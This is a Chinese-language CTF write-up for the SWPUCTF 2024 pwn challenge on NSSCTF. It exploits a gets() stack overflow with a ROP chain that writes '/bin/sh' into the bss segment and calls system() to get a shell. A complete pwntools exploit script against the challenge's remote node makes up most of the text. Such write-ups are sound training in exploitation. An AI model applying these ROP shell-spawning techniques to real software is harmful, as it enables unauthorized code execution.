[SWPUCTF 2024 秋季新生赛]ret2libc也阴嘛？（NSSCTF）

ida 反编译看 main 函数

gets 存在栈溢出

偏移 48+8 = 56

自带后门函数

但是没有 /bin/sh

存在可写段，我们可以利用 gets 写入 /bin/sh

payload：

先将可写地址存到 rdi，然后再次调用 gets 函数来接受输入 /bin/sh 读取到 bss_addr

然后再存入被改写内容的地址，作为参数，调用 system 函数即可  

payload = cyclic(offset) + p64(pop_rdi_addr) + p64(bss_addr)  + p64(gets_addr) 
payload += p64(pop_rdi_addr) + p64(bss_addr) + p64(system_addr)

编写 exp：

我们在调用 gets 函数之后并不需要返回到原来的函数中

在调用 gets 函数和 system 函数之间并不需要进行额外的栈调整

因此用不到 ret

# @author：My6n
# @time：20250523
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('node6.anna.nssctf.cn',29271)
elf = ELF('./pwn')
offset = 56
pop_rdi_addr = 0x401273
bss_addr = 0x404000
system_addr = elf.symbols['system']
gets_addr = elf.symbols['gets']
payload = cyclic(offset) + p64(pop_rdi_addr) + p64(bss_addr)  + p64(gets_addr) 
payload += p64(pop_rdi_addr) + p64(bss_addr) + p64(system_addr)
io.sendline(payload)
io.sendline(b'/bin/sh')
io.interactive()

可以打通